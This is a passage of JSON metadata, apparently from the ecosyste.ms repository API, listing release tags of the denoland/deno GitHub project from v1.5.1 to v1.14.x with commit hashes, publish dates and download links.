s.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G